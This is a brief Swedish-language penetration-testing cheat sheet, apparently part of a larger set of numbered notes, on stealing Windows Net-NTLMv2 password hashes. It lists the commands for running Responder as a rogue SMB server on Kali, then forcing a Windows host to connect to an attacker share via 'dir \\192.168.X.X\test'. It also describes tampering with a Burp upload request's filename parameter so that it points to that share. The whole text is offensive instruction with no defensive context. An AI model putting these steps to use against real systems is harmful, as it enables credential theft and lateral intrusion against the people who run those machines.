7. Net-NTLMv2 Stealing


RCE Net-NTLMv2 Hash Steal:

  1. Enumerera användaren (valfritt):
net user <user>
  1. Sätt upp SMB Server med Responder i Kali:
sudo responder -I <interface>
  1. Skicka en förfrågan efter en arbiträr share på SMB-servern från Windows:
dir \\192.168.X.X\test
  1. Win!

File Upload Net-NTLMv2 Hash Steal:

  1. Modifiera Burp Requesten för parametern 'filename' att ladda upp en arbiträr fil från Responder-SMB:n.
  2. Win!